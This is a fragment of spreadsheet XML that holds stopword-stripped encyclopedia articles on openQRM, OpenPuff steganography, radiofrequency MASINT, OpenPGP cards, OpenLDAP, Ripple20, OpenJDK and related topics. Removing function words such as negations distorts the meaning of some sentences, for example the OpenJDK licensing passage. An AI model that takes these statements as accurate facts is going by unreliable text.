openstack, ec2, azure, etc.). over plug-ins available openqrm enterprise. plug-ins openqrm utilises plug-ins customise functionality. these plug-ins allow increased integration compatibility. their plug-in library ever-expanding falls categories; cloud, container, deployment, documentation, high-availability, management, miscellaneous, monitoring, network, storage virtualisation. history openqrm initially released qlusters company went open-source 2006. qlusters ceased operations, openqrm left hands openqrm community. november 2008, openqrm community released version included complete port platform java php/c/perl/shell. 2020, openqrm enterprise gmbh assets intellectual property acquired fiveways international ltd, appointed openqrm australia master distributor. latest release release 5.3.50 29.08.2021 5.3.50 openqrm release community enterprise. primary supported platform debian updated dependencies. also cloud computing cloud computing comparison cloud infrastructure references external links openqrm website</t>
  </si>
  <si>
    <t>OpenPuff</t>
  </si>
  <si>
    <t>openpuff steganography watermarking, sometimes abbreviated openpuff puff, free steganography tool microsoft windows created cosimo oliboni still maintained independent software. program notable first steganography tool (version 1.01 released december 2004) that: lets users hide data single carrier file. when hidden data split among carrier files carrier chain, enforced hidden data theoretical size limit (256mb, 512mb, depending implementation) implements layers hidden data obfuscation (cryptography, whitening encoding) extends deniable cryptography deniable steganographylast revision supports wide range carrier formats images bmp, jpg, png, audios aiff, mp3, videos 3gp, mp4, mpeg mpeg flash-adobe flv, pdf, openpuff used primarily anonymous asynchronous data sharing: sender hides hidden stream inside public available carrier files (password carrier files carrier order secret key) receiver unhides hidden stream knowing secret keythe advantage steganography, cryptography alone, messages attract attention themselves. plainly visible encrypted messages matter unbreakable arouse suspicion, incriminating countries encryption illegal. therefore, whereas cryptography protects contents message, steganography said protect messages communicating parties. watermarking action signing file copyright mark. openpuff invisible steganographic way, applied supported carrier. invisible mark, password protected, accessible everyone (using program). multi-cryptography openpuff semi-open source program: cryptography, csprng, hashing (used password hexadecimal extension), scrambling open sourcecryptographic algorithms taken aes, nessie cryptrec) joined unique multi-cryptography algorithm: keys internal static data initialized algorithm data block (128bit) encrypted using different algorithm chosen pseudorandom oracle, seeded second independent password1. choosing cryptography algorithm data block rand oracle applying cryptography data block cipher statistical resistance extensive testing performed statistical resistance properties csprng multi-cryptography modules, using ent, nist diehard test suites. provided results taken 64kb, 128kb, 256mb samples: entropy test: &gt;7.9999xx 8.000000 compression test: size reduction compression square distribution test: deviation mean value test: 127.4x 127.5 monte carlo test: error 0.01% serial correlation test: 0.0001 steganalysis resistance security, performance steganalysis resistance conflicting trade-offs.[security performance]: whitening pro: ensures higher data security pro: allows deniable steganography con1: requires extra carrier bits[security steganalysis]: cryptography whitening pro: ensure higher data security con2: random statistical response marks carriers "suspicious"data, carrier injection, encrypted whitened: small amount hidden data turns chunk pseudorandom "suspicious data". carrier injection encodes using linear covering function takes also original carrier bits input. modified carriers need much less change (con1) and, lowering random-like statistical response, deceive many steganalysis tests (con2). deniable steganography there always non-negligible probability detected, even hidden stream behaves like “natural container” (unpredictable side-effects, caught flagrante delicto, etc.). resisting unpredictable attacks also possible, even user forced legal physical coercion) provide valid password. deniable steganography decoy-based technique) allows user deny convincingly fact sensitive data hidden. user needs provide expendable decoy data would plausibly want keep confidential reveal attacker, claiming also references external links homepage sourcepage</t>
  </si>
  <si>
    <t>Radiofrequency MASINT</t>
  </si>
  <si>
    <t>radiofrequency masint major disciplines generally accepted make field measurement signature intelligence (masint), regard masint subdisciplines overlap, masint, turn, complementary traditional intelligence collection analysis disciplines sigint imint. masint encompasses intelligence gathering activities bring together disparate elements within definitions signals intelligence (sigint), imagery intelligence (imint), human intelligence (humint). according united states department defense, masint technically derived intelligence (excluding traditional imagery imint signals intelligence sigint) collected, processed, analyzed dedicated masint systems results intelligence detects, tracks, identifies, describes signatures (distinctive characteristics) fixed dynamic target sources. masint recognized formal intelligence discipline 1986. measurement signature intelligence overview discipline unifying principles. many branches masint, specific techniques overlap major conceptual disciplines masint defined center masint studies research, divides masint electro-optical, nuclear, geophysical, radar, materials, radiofrequency disciplines. disciplines masint made major disciplines, disciplines overlap intertwine. they interact traditional intelligence disciplines humint, imint, sigint. confusing, masint highly technical called such, techint another discipline, dealing things analysis captured equipment. example interaction "imagery-defined masint (idm)". idm, masint application would measure image, pixel pixel, identify physical materials, types energy, responsible pixels groups pixels: signatures. when signatures correlated precise geography, details object, combined information becomes something greater whole imint masint parts. center masint studies research breaks masint into: electro-optical masint nuclear masint geophysical masint radar masint materials masintwhere comint elint, major components sigint, focus intentionally transmitted part signal, radiofrequency masint focuses unintentionally transmitted information. example, given radar antenna sidelobes emanating direction main antenna aimed. radint (radar intelligence) masint subdiscipline involves learning recognize radar primary signal, captured elint, sidelobes, perhaps captured main elint sensor, likely, sensor aimed sides radio antenna. masint associated comint might involve detection common background sounds expected human voice communications. example, given radio signal comes radio used tank, interceptor hear engine noise higher voice frequency voice modulation usually uses, even though voice conversation meaningful, masint might suggest deception, coming real tank. frequency domain masint different emitter location sigint, frequency analysis masint concentrates finding specific device, characterizing signatures class devices, based intentional unintentional radio emissions. devices characterized could include radars, communication radios, radio signals foreign remote sensors, radio frequency weapons (rfw), collateral signals weapons, weapon precursors, weapon simulators (for example, electromagnetic pulse signals associated nuclear bursts); spurious unintentional signals.see hf/df discussion sigint-captured information masint flavor, determining frequency receiver tuned, detecting frequency beat frequency oscillator superheterodyne receiver. this also considered unintentional radiation (rint). local oscillator intercept technique, operation rafter first made public book retired senior officer britain's counterintelligence service, mi5. book also discusses acoustic methods capturing comint. electromagnetic pulse masint nuclear large conventional explosions produce radio frequency energy. characteristics vary altitude burst size. emp-like effects always open-air space explosions; work controlled explosions generating electrical pulse drive lasers railguns. example, program called burning light, kc-135r tankers, temporarily modified carry masint sensors, would around test area, part operation burning light. sensor system measured electromagnetic pulse detonation.while often assumed characteristic nuclear weapons alone, case. several open-literature techniques, requiring conventional explosives, case high power microwave, large electrical power supply, perhaps one-shot capacitors, generate significant emp: explosively pumped flux compression generators (fcg) explosive propellant driven generators high power microwave sources spark gaps vircatoremp intelligence deals offensive capability build, generate particular power frequency spectra, means optimizing coupling power delivery, defensive considerations vulnerability. vulnerability components: coupling modes possible source equipment front door coupling goes antenna intended receive power frequency range generated back door coupling produces surges power (including ground) communications wire. level energy coupled damage destroy particular target.another aspect offensive intelligence evaluate ways weapon could improve coupling. approach involves device extruding antennas. another, similar precision guided munitions, bring device close possible target. intelligence defense would consider deliberate shielding (e.g., faraday cages) greater optical cabling. unintentional radiation masint integration specialized application masint techniques unintentional radiation sources (rint) incidental propagation operating characteristics military civil engines, power sources, weapons systems, electronic systems, machinery, equipment, instruments. these techniques valuable detecting, tracking, monitoring variety activities interest. black crow: truck detection minh trail vietnam-era "black crow" rint sensor, carried aboard ac-130 gunships, detected "static" produced ignition system trucks minh trail, distances miles, cued weapons onto trucks. monitoring potentially necessary electronic emissions another technique could determine frequency receiver tuned technique operation rafter, listened direct additive frequency local oscillator superheterodyne receiver. this technique countered shielding intermediate frequency circuitry superheterodyne receivers, moving software-defined radio using digital signal processors local oscillator. unintentional radiation electronic devices this discipline blurs various techniques collecting comint unintentional radiation, electromagnetic acoustic, electronic devices. tempest unclassified code word techniques securing equipment eavesdropping radiation emanations. blurry areas, example, understanding normal incidental radiation something basic television set. signals consumer product sufficiently complex practical hide covert eavesdropping channel within covert modulators audio surveillance another category, code name teapot apply, detection simply unintended audio modulation external signal flooding area surveilled. some object within room acoustically couples sound room, acts modulator. group covert surveillance examines reflected amplitude modulation original frequency, across spectral band frequency modulation example, 1952, soviets presented moscow embassy beautiful great seal united states. seal, however, acoustic diaphragm, forming side resonant cavity which, illuminated microwave beam, reflected beam back signal modulated audio conversations room. conversations caused dimensions resonant cavity change, producing modulated signal, this passive resonant cavity bug.this effect require purpose-built modulator. items mundane incandescent light bulb modulators. teapot, assuming code name, similarities technique using reflections laser window. technique, window vibrates acoustic pressure inside, modulates laser carrier. secure signal leakage ground early first world war, possible intercept information content telegraph telephone using electrically unbalanced signals, detecting signals greater amplitude expected electrical ground. unbalanced transmission, ground serves signal reference. covert modulation digital surveillance 1950s, found could electrical coupling unencrypted side "red" signal inside secure communications facility, either conductor carrying "black" encrypted signal, possibly electrical ground(s) system. tempest protective measures work situation frequency black signals same. signal, power level, intercepted directly, intermodulation black signals. hijack advanced threat, signal modulates signal generated within secure area, cellular telephone. while hijack targets nonstop targets pulses digital device, typically computer. references</t>
  </si>
  <si>
    <t>OpenPGP card</t>
  </si>
  <si>
    <t>cryptography, openpgp card iso/iec 7816-4, compatible smart card integrated many openpgp functions. using smart card, various cryptographic tasks (encryption, decryption, digital signing/verification, authentication etc.) performed. allows secure storage secret material; versions protocol state, "private keys passwords cannot read card command function." however, pairs loaded onto card time, overwriting existing ones. original openpgp card built basiccard, remains available retail. several mutually compatible javacard implementations openpgp card's interface protocol available open source software installed generic javacard smart cards, including nfc-enabled cards. nitrokey yubico provide tokens implementing protocol smart card emulation. smart card daemon, combination supported smart card readers, implemented gnupg, used many cryptographic applications. with gpg-agent gnupg ssh-agent implementation using gnupg, openpgp card used authentication also. vendor openpgp card features unique serial number allow software specific card. serial numbers assigned vendor basis vendors registered fsfe. assigned vendor are: references</t>
  </si>
  <si>
    <t>OpenPAM</t>
  </si>
  <si>
    <t>openpam bsd-licensed implementation used freebsd, netbsd, dragonfly macos (starting snow leopard), offered alternative linux certain linux distributions. openpam developed freebsd project dag-erling smørgrav labs, security research division network associates, inc. darpa/spawar contract n66001-01-c-8035 ("cboss"), part darpa chats research program. january 2008, openpam eleven projects selected coverity promotion rung dhs-funded open source hardening project, tracks bugs found open-source software coverity's prevent static program analysis tool. september 2009, openpam promoted rung along ruby, samba tor. references</t>
  </si>
  <si>
    <t>OpenNebula</t>
  </si>
  <si>
    <t>opennebula cloud computing platform managing heterogeneous distributed data center infrastructures. opennebula platform manages data center's virtual infrastructure build private, public hybrid implementations infrastructure service. primary uses opennebula platform data center virtualization cloud deployments based hypervisor, lxd/lxc system containers, firecracker microvms. platform also capable offering cloud infrastructure necessary operate cloud existing vmware infrastructure. early june 2020, opennebula announced release enterprise edition corporate users, along community edition. opennebula free open-source software, released apache license version opennebula comes free access maintenance releases upgrades minor/major versions available users non-commercial deployments significant contributions opennebula community. opennebula distributed closed-source license requires commercial subscription. history opennebula project started research venture 2005 ignacio llorente ruben montero. first public release software occurred 2008. goals research create efficient solutions managing virtual machines distributed infrastructures. also important solutions ability scale high levels. open-source development active community developers since helped mature project. project matured began become adopted march 2010 primary writers project founded c12g labs, known opennebula systems, provides value-added professional services enterprises adopting utilizing opennebula. description opennebula orchestrates storage, network, virtualization, monitoring, security technologies deploy multi-tier services (e.g. compute clusters) virtual machines distributed infrastructures, combining data center resources remote cloud resources, according allocation policies. according european commission's 2010 report "... cloud dedicated research projects widest sense initiated prominent amongst probably opennebula ...".the toolkit includes features integration, management, scalability, security accounting. also claims standardization, interoperability portability, providing cloud users administrators choice several cloud interfaces (amazon query, open cloud computing interface vcloud) hypervisors (vmware vcenter, kvm, lxd/lxc firecracker), accommodate multiple hardware software combinations data center.opennebula sponsored opennebula systems (formerly c12g). opennebula widely used variety industries, including cloud providers, telecommunication, information technology services, government, banking, gaming, media, hosting, supercomputing, research laboratories, international research projects. opennebula project also used cloud solutions cloud engine. opennebula grown significantly since going public many notable users variety industries. notable users telecommunications internet industry include akamai, blackberry, fuze, telefónica, indigital. users information technology industry include technologies, hewlett packard enterprise, hitachi vantara, informatica, centos, netways, ippon technologies, terradue 2.0, unisys, technologies, liberologico, etnetera, systems, inovex, bosstek, datera, saldab, hash include, blackpoint, deloitte, sharx server storage solutions, nts. government solutions utilizing opennebula project include national central library florence, bdigital, deutsch e-post, rediris, grnet, instituto geografico nacional, csic, gobex, asac communications, knaw, junta andalucia, flanders environmental agency, red.es, cenatic, milieuinfo, sigma, computaex. notable users financial sector include transunion, produpan, axcess financial, farm credit services america, nasdaq dubai. media gaming users include bbc, unity, r.u.r., crytek, ispot.tv, nordeus. hosting providers include vps, nbsp, orion citec, libreit, quobis, virtion, ongrid, altus, dmex, lmd, hostcolor, handy networks, bit, good hosting, avalon, noosvps, opulent cloud, ptisp, ungleich.ch, france, teledata, cipherspace, nuxit, cyon, tentacle networks, virtiso metanet, e-tugra, lunacloud, todoencloud, echelon, knight point systems, twelve solutions, flexyz. saas enterprise users include scytl, leadmesh, optimalpath, rjmetrics, carismatel, sigma, globalrap, runtastic, moz, rentalia, vibes, yuterra, best buy, roke, intuit, securitas direct, trivago, booking.com. science academia implementations include research computing harvard university, fermilab, nikhef, cnrs, desy, infn, halle, csiro, fccn, aist, kisti, kit, asti, fatec lins, mimos, sztaki, ciemat, surfsara, esa, nasa, scanex, nchc, cesga, crs4, pdc, csuc, tokyo institute technology, csc, hpci, cerit-sc, lrz, pic, telecom paris, universidade federal ceara, instituto superiore mario barella, academia sinica, unachi, ucm, universite catholique louvain, universite strasbourg, ecmwf, tel, inaftng, teidehpc, cujae, kent state university. cloud products using opennebula include classcat, hexagrid, nodeweaver, impetus, zeronines. development opennebula follows rapid release cycle improve user satisfaction rapidly delivering features innovations based user requirements feedback. words, giving customers want quickly, smaller increments, additionally increasing technical quality. major upgrades generally occur every years upgrade generally updates. opennebula project mainly open-source possible thanks active community developers translators supporting project. since version 5.12 upgrade scripts closed source license, makes upgrading versions impossible without subscription unless prove operating non-profit cloud made significant contribution project. release history version tp2, technology previews, offered host management features, based hypervisor. version first stable release, introduced drivers, enabling hybrid clouds. version added structure documentation hybrid functionality. version added public cloud apis oned build public cloud virtual network management. version added mysql backend, ldap authentication, management images virtual networks. version added integration guides, ganglia monitoring occi (converted add-ons later releases), java bindings sunstone gui. version added migration path previous versions, vlan, ebtables integration virtual networks, acls accounting subsystem, vmware driver, virtual data centers federation across data centers. version added firewalling (deprecated later security groups). version introduced iscsi datastore, cluster first class citizen quotas. version added virtual routers, datastores public opennebula marketplace integration. version added oneflow components service management onegate application insight. version added support ceph files datastore onedb tool. version added self service portal (cloud view) vmfs datastore. version released 2014, brought number innovations open cloud, improved cloud bursting, implemented multiple system datastores storage load policies. version allowed users different instances opennebula geographically dispersed different data centers, known federation opennebula. cloud portal cloud consumers also introduced market support provided import ovas. version began offering support microsoft azure ibm. developers, also continued evolving improving platform incorporating support oneflow cloud view. this meant users could define virtual machine applications services elastically. version 4.10 integrated support portal sunstone gui. login token also developed, support provided vcenter. version 4.12 offered functionality implement security groups improve vcenter integration. show back model also deployed track analyze clouds different departments. version 4.14 introduced newly redesigned modularized graphical interface code, sunstone. this intended improve code readability ease task adding components. version 'wizard' introduced marketplaces means share images across different opennebula instances. management virtual routers network topology visual tool sunstone. version 'excession' added ipam subsystem network integrations, also added ldap group dynamic mapping. version 'medusa' introduced full storage network management vcenter, support groups define affinity hypervisors. implementation raft controller. version 'blue flash' focused scalability improvements, well improvements. version 'edge' added support infrastructure containers, automatic selection distributed datacenters (ddc), ability bare metal providers build remote clusters edge hybrid cloud environments. version 5.10 'boomerang' added numa pinning, integration, revamped hook subsystem based 0mq, dpdk support authentication sunstone. version 5.12 'firework' removal upgrade scripts, added support firecracker micro-vms, integration docker hub, security group integration (nsx), several improvements sunstone, revamped oneflow component, improved monitoring subsystem. version 'mutara' multi-cloud architecture based "edge clusters", enhanced docker kubernetes support, fireedge webui, revamped oneflow, backup capabilities. version 'red square' improvements driver, support workload portability, beta preview sunstone gui. version 'archeon' support automatic deployment management edge clusters based ceph using on-premise infrastructure bare-metal resources, addition notion network states, improvements sunstone gui, driver, integration vmware vcenter. internal architecture basic components host: physical machine running supported hypervisor. cluster: pool hosts share datastores virtual networks. template: virtual machine definition. image: virtual machine disk image. virtual machine: instantiated template. virtual machine represents life-cycle, several virtual machines created single template. virtual network: group leases automatically obtain addresses. allows creation virtual networks mapping physical ones. they available corresponding bridges hosts. virtual network defined three different parts:underlying physical network infrastructure. logical address space available (ipv4, ipv6, dual stack). context attributes (e.g. mask, dns, gateway). opennebula also comes virtual router appliance provide networking services like dhcp, etc. components deployment model opennebula project's deployment model resembles classic cluster architecture utilizes front-end (master node) hypervisor enabled hosts (worker nodes) datastores physical network front-end machine master node, sometimes referred front-end machine, executes opennebula services. this actual machine opennebula installed. opennebula services front-end machine include management daemon (oned), scheduler (sched), interface server (sunstone server), advanced components. these services responsible queuing, scheduling, submitting jobs machines cluster. master node also provides mechanisms manage entire system. this includes adding virtual machines, monitoring status virtual machines, hosting repository, transferring virtual machines necessary. much possible monitoring subsystem gathers information host status, performance, capacity use. system highly scalable limited performance actual server. hypervisor enabled-hosts worker nodes, hypervisor enabled-hosts, provide actual computing resources needed processing jobs submitted master node. opennebula hypervisor enabled-hosts virtualization hypervisor vmware, xen, kvm. hypervisor natively supported used default. virtualization hosts physical machines virtual machines various platforms used opennebula. virtualization subsystem interacts hosts take actions needed master node. storage datastores simply hold base images virtual machines. datastores must accessible front-end; accomplished using variety available technologies nas, san, direct attached storage. three different datastore classes included opennebula, including system datastores, image datastores, file datastores. system datastores hold images used running virtual machines. images complete copies original image, deltas, symbolic links depending storage technology used. image datastores used store disk image repository. images image datastores moved system datastore virtual machines deployed manipulated. file datastore used regular files often used kernels, disks, context files. physical networks physical networks required support interconnection storage servers virtual machines remote locations. also essential front-end machine connect worker nodes hosts. least physical networks required opennebula requires service network instance network. froimage files. instance network allows virtual machines connect across different hosts. network subsystem opennebula easily customizable allow easy adaptation existing data centers. also openstack cloudstack cloud computing cloud computing comparison ganeti openqrm ovirt references external links opennebula website</t>
  </si>
  <si>
    <t>Month of bugs</t>
  </si>
  <si>
    <t>month bugs strategy used security researchers draw attention security procedures commercial software corporations. researchers started project software products believe corporations shown unresponsive uncooperative security alerts. responsible disclosure working properly, find disclose security vulnerability month. examples original "month bugs" month browser bugs (mobb) security researcher moore.subsequent similar projects include: month kernel bugs (mokb) published kernel bugs linux, freebsd, solaris windows, well four wireless driver bugs. month apple bugs (moab) conducted researchers kevin finisterre published bugs related month bugs sponsored hardened team published bugs. also fuzz testing metasploit project vulnerability disclosure references further reading external links month kernel bugs (mokb) archive kernel fun: month kernel bugs blog month apple bugs (moab) archive apple fun: month apple buggs blog info-pull.com blog: complementary blog hosts mokb moab month security</t>
  </si>
  <si>
    <t>OpenLDAP</t>
  </si>
  <si>
    <t>openldap free, open-source implementation lightweight directory access protocol (ldap) developed openldap project. released bsd-style license called openldap public license.ldap platform-independent protocol. several common linux distributions include openldap software ldap support. software also runs bsd-variants, well aix, android, hp-ux, macos, solaris, microsoft windows derivatives, e.g. 2000, vista, windows etc.), z/os. history openldap project started 1998 kurt zeilenga. project started cloning ldap reference source university michigan long-running project supported development evolution ldap protocol project's final release 1996. 2015, openldap project four core team members: howard (chief architect), quanah gibson-mount, hallvard furuseth, kurt zeilenga. there numerous important active contributors including ondrej kuznik, luke howard, ryan tandy, gavin henry. past core team members include pierangelo masarati. components openldap four main components: slapd stand-alone ldap daemon associated modules tools. lloadd stand-alone ldap load balancing proxy server libraries implementing ldap protocol asn.1 basic encoding rules (ber) client software: ldapsearch, ldapadd, ldapdelete, othersadditionally, openldap project home number subprojects: jldap ldap class libraries java jdbc-ldap java jdbc ldap bridge driver ldapc++ ldap class libraries lmdb memory-mapped database library backends overall concept historically openldap server (slapd, standalone ldap daemon) architecture split frontend handles network access protocol processing, backend deals strictly data storage. this split design feature original university michigan code written 1996 carried subsequent openldap releases. original code included main database backend experimental/demo backends. architecture modular many different backends available interfacing technologies, traditional databases. note: older (1.x) releases, terms "backend" "database" often used interchangeably. precise, "backend" class storage interface, "database" instance backend. slapd server arbitrarily many backends once, arbitrarily many instances backend (i.e., arbitrarily many databases) active once. available backends currently different backends provided openldap distribution, various third parties known maintain backends independently. standard backends loosely organized three different categories: data storage backends actually store data back-bdb: first transactional backend openldap, built berkeley removed openldap 2.5. back-hdb: variant back-bdb fully hierarchical supports subtree renames, removed openldap 2.5. back-ldif: built plain text ldif files back-mdb: transactional backend built openldap's lightning memory-mapped database (lmdb) back-ndb: transactional backend built mysql's cluster engine, removed openldap 2.6. back-wiredtiger: experimental transactional backend built wiredtiger, introduced openldap 2.5. proxy backends gateways data storage systems back-asyncmeta: asynchronous proxy meta-directory features, introduced openldap 2.5. back-ldap: simple proxy ldap servers back-meta: proxy meta-directory features back-passwd: uses unix system's passwd group data back-relay: internally redirects slapd backends back-sql: talks arbitrary databases, deprecated openldap 2.5. dynamic backends generate data back-config: slapd configuration ldap back-dnssrv: locates ldap servers back-monitor: slapd statistics ldap back-null: sink/no-op backend, analogous unix /dev/null back-perl: invokes arbitrary perl modules response ldap requests, deprecated openldap 2.5. back-shell: invokes shell scripts ldap requests, removed openldap 2.5. back-sock: forwards ldap requests arbitrary daemonssome backends available older openldap releases retired use, notably back-ldbm inherited original umich code, back-tcl similar back-perl back-shell.support backends soon withdrawn well. back-ndb removed since partnership mysql development terminated oracle oracle acquired mysql. back-bdb back-hdb removed favor back-mdb since back-mdb superior aspects performance, reliability, manageability. practice, backends like -perl -sock allow interfacing arbitrary programming language, thus providing limitless capabilities customization expansion. effect slapd server becomes engine compact, well-defined ubiquitous api. overlays overall concept ordinarily ldap request received frontend, decoded, passed backend processing. when backend completes request, returns result frontend, sends result ldap client. overlay piece code inserted frontend backend. thus able intercept requests trigger actions backend receives them, also likewise backend's results reach frontend. overlays complete access slapd internal apis, invoke anything frontend backends could perform. multiple overlays used once, forming stack modules frontend backend. overlays provide simple means augment functionality database without requiring entirely backend written, allow functionalities added compact, easily debuggable maintainable modules. since introduction overlay feature openldap many overlays contributed openldap community. available overlays currently overlays core openldap distribution, another overlays user-contributed code section, awaiting approval inclusion. other modules backends overlays commonly used types modules. backends typically built slapd binary, also built dynamically loaded modules, overlays usually built dynamic modules. addition, slapd supports dynamic modules implementing ldap syntaxes, matching rules, controls, extended operations, well implementing custom access control mechanisms password hashing mechanisms. openldap also supports slapi, plugin architecture used netscape/fedora/red hat. current releases, slapi framework implemented inside slapd overlay. while many plugins written sun/netscape/fedora/red compatible openldap, members openldap community slapi. available modules native slapd modules acl/posixgroup support posixgroup membership access controls comp_match support component-based matching kinit maintain/refresh kerberos slapd passwd/ additional password hashing mechanisms. currently includes kerberos, netscape, radius, sha-2. slapi plugins addrdnvalue value entry omitted request release summary major (functional) releases openldap software include: openldap version general clean-up last release university michigan project (release 3.3), consolidation additional changes. openldap version 2.0, released august 2000, included major enhancements including ldap version (ldapv3) support, internet protocol version (ipv6) support, numerous enhancements. openldap version 2.1, released june 2002, included transactional database backend (based berkeley database bdb), simple authentication security layer (sasl) support, meta, monitor, virtual experimental backends. openldap version 2.2, released december 2003, included ldap "sync" engine replication support (syncrepl), overlay interface, numerous database rfc-related functional enhancements. openldap version 2.3, released june 2005, included configuration backend (dynamic configuration), additional overlays including rfc-compliant password policy software, numerous additional enhancements. openldap version 2.4, released october 2007, introduced n-way multimaster replication, stand-by master, ability delete modify schema elements fly, plus many more. openldap version 2.5, released april 2021, introduced ldap load balancing proxy server, ldap transaction support, proxy protocol support, plus much more. openldap version 2.6, released october 2021, introduced additional load balancing strategies additional options improve coherence certain ldap controls extended operations ldap load balancer daemon ability directly file rather syslog slapd lloadd replication openldap supports replication using content synchronization specified 4533. this spec hereafter referred "syncrepl". addition base specification, enhancement known delta-syncrepl also supported. additional enhancements implemented support multi-master replication. syncrepl basic synchronization operation described 4533. protocol defined persistent database changes required. rather changes implied change sequence number (csn) information stored entry optimized optional session particularly useful track recent deletes. model operation replication client (consumer) sends "content synchronizing search" replication server (provider). consumer provide cookie search (especially sync provider previously). openldap implementation 4533, cookie includes latest received provider (called contextcsn). provider returns search results (or, optimization below, sync info replies) present (unchanged entry used present phase refresh stage) attributes), added, modified (represented refresh phase current attributes), deleted attributes) entries consumer synchronized state based known cookie. cookie absent indicates consumer totally sync, provider will, refresh stage, send entry has. ideal case, refresh stage response contains delete phase small adds (including represent current result modifies) deletes occurred since time consumer last synchronized provider. however, limited session state (also non-persistent) kept provider, present phase required, particularly including presentation unchanged entries means (inefficient) implying deleted provider since consumer last synchronized. search done either refresh refreshandpersist mode, implies stages occur. refresh stage always occurs first. during refresh stage, phases occur: present delete, present always occurs delete. phases delimited sync info response specifies phase completed. refresh persist stages also delimited sync info response. optional optimization compactly represent group entries presented deleted sync info response containing syncidset identifies list entryuuid values entries. present phase differentiated delete phase follows. entries present unchanged entries returned present phase. entries delete entries provided delete phase. either phase, entries (including adds represent current attributes modified entries) returned. present phase, entry consumer identified entry present response present phase implicitly longer provider thus must deleted consumer synchronize consumer provider. once persist stage begins, provider sends search results indicate add, modify delete entries present unchanged entry indications) entries changed since refresh stage completed. persist stage continues indefinitely, meaning search final "done" response. contrast, refresh mode refresh stage occurs stage completes done response also ends present delete phase (whichever phase currently active). delta-syncrepl this protocol keeps persistent database write accesses (changes) represent modify precisely (meaning attributes changed). still built standard syncrepl specification, always sends changes complete entries. delta-syncrepl, transmitted entries actually sent database, change main database recorded entry. entries recorded using ldap schema. also list ldap software references external links official website openldap foundation using libldap, tutorial openldap client openldap update article marty heyman september 2007</t>
  </si>
  <si>
    <t>Ripple20</t>
  </si>
  <si>
    <t>ripple20 vulnerabilities discovered 2020 software library implemented tcp/ip stack. security concerns discovered jsof, named collective vulnerabilities company's code became embedded numerous products. description ripple20 vulnerabilities discovered 2020 software library developed cincinnati-based company treck inc., implemented tcp/ip stack. history first release treck's library around 1997. treck also worked elmic systems, created fork library companies ended collaboration. september 2019, jsof researchers analyzed device containing code library discovered vulnerabilities. further analysis determined code originated treck's library, widely implemented numerous manufacturers. disclosure vulnerabilities made june 2020. ripple20 chosen name vulnerabilities based disclosure year idea problems "rippled" supply chain company. difficult identify affected devices, manufacturers realize library used components. references external links "vulnerability response information". treck.com.</t>
  </si>
  <si>
    <t>OpenJDK</t>
  </si>
  <si>
    <t>openjdk (open java development kit) free open-source implementation java platform, standard edition (java se). result effort microsystems began 2006. implementation licensed gpl-2.0-only linking exception. were linking exception, components linked java class library would subject terms license. openjdk official reference implementation java since version components openjdk project produces number components: importantly virtual machine (hotspot), java class library java compiler (javac). web-browser plugin start, form part oracle java, included openjdk. previously indicated would open-source components, neither oracle done currently available free plugin start implementations 2016 provided icedtea.openjdk supports compilation (jaotc) using graalvm (jep 295). experimental -xx:+enablejvmciproduct flag enables graal (jep 317). openjdk versions openjdk initially based version java platform.since effort produce open-source reference implementation java platform moved project. unlike past release projects, produced feature release terminated, long-running project produce future feature releases ship feature release every months according strict, time-based model.there several separate openjdk project development branches: project release project release project release project release project release project release project release project release project release openjdk project, basis openjdk project, based produces updates existing java releases. openjdk project, basis released march 2014. openjdk project, based produces updates existing java releases. openjdk project, based retrofitted provide open-source version java note resigned leadership openjdk beginning 2017 taken azul systems. openjdk builds oracle longer releasing updates long-term support (lts) releases permissive license, others begun offering builds. linux distributions always offered builds, windows also offers now; winget install ojdkbuild.openjdk.17.jre icedtea inclusion software distributions order bundle openjdk fedora free linux distributions, openjdk needed buildable using free software components. encumbered components class library implicit assumptions within build system used build openjdk jdk, possible. achieve openness, started icedtea project june 2007. began life openjdk/gnu classpath hybrid could used bootstrap openjdk, replacing encumbrances code classpath.on november 2007, signed contributor agreement openjdk community license. first benefits agreement tighter alignment icedtea project, brings together fedora, linux distribution, jboss, application server, technologies linux environment. icedtea provided free software alternatives remaining proprietary sections openjdk project. 2008, fedora ubuntu 8.04 distributions included icedtea based completely free open source code. fedora first version shipped icedtea6, based openjdk6 sources rather openjdk7. also first openjdk package name (via openjdk trademark agreement) instead icedtea. ubuntu also first packaged icedtea7 later moving icedtea6. packages icedtea6 also created debian included lenny. july 2008, debian accepted openjdk-6 unstable, later included stable. openjdk also available opensuse, enterprise linux rhel derivatives centos.in june 2008, announced packaged binaries openjdk fedora built using icedtea passed technology compatibility tests could claim fully compatible java implementation. july 2009, icedtea binary build ubuntu 9.04 passed compatibility tests java tck.since august 2008, openjdk usable macos variants.on android nougat, openjdk replaced now-discontinued apache harmony java libraries source code mobile operating system. google legal dispute oracle claims copyright patent infringement re-implementations copyrighted java apis harmony. while also stating change create consistent platform java android platforms, company admitted switch motivated lawsuit, arguing oracle authorized openjdk code licensing gpl. history sun's promise initial release announced javaone 2006 java would become open-source software, october 2006, oracle openworld conference, jonathan schwartz said company intended announce open-sourcing core java platform within days.sun released java hotspot virtual machine compiler free software general public license november 2006, promise rest (which includes java runtime environment) would placed march 2007, "except components right publish source form gpl". according free-software advocate richard stallman, would "java trap", vendor lock-in argues applied java programs written java. release class library following promise release java development (jdk) based almost completely free open-source code first half 2007, released complete source code java class library 2007, except limited parts licensed third parties unable re-license gpl. included list encumbered parts several major components java graphical user interface (gui). stated planned replace remaining proprietary components alternative implementations make class library completely free. when initially released 2007, openjdk class library remained proprietary. appearance openjdk 2008, less (the snmp implementation, part java specification) remained, making possible build openjdk without binary plugs. binary plug requirement later dropped openjdk part april 2009.this made possible, course first year, work microsystems openjdk community. each encumbrance either released free open-source software replaced alternative. beginning december 2010, so-called binary plugs replaced open-source replacements, making whole open sourced binary plugs necessary anymore. community improvements november 2007, announced agreement sun, signing sun's broad contributor agreement (which covers participation sun-led free open-source software projects engineers) sun's openjdk community technology compatibility (tck) license agreement (which gives company access test suite determines whether project based openjdk complies java specification).also november 2007, porters group created openjdk efforts port openjdk different processor architectures operating systems. porting project kurt miller greg lewis porting project (based one) landon fuller expressed interest joining openjdk porters group. january 2008, part mailing list discussions. another project pending formalization porters group haiku java team bryan varner.in december 2007, moved revision control openjdk teamware mercurial (and later github), part process releasing open-source communities.openjdk comparatively strict procedures accepting code contributions: every proposed contribution must reviewed another openjdk committer contributor must signed sun/oracle contributor agreement (sca/oca). preferably, also jtreg test demonstrating fixed. initially, external patch submission process slow and, september 2008, commits codebase made engineers. process improved and, 2010, simple patches backports openjdk openjdk take place within hours rather days.in 2011, unofficial port openjdk os/2 first released. this port included os/2 derivative arcaos.on september 2013, microsoft azul systems collaborated create zulu, build openjdk 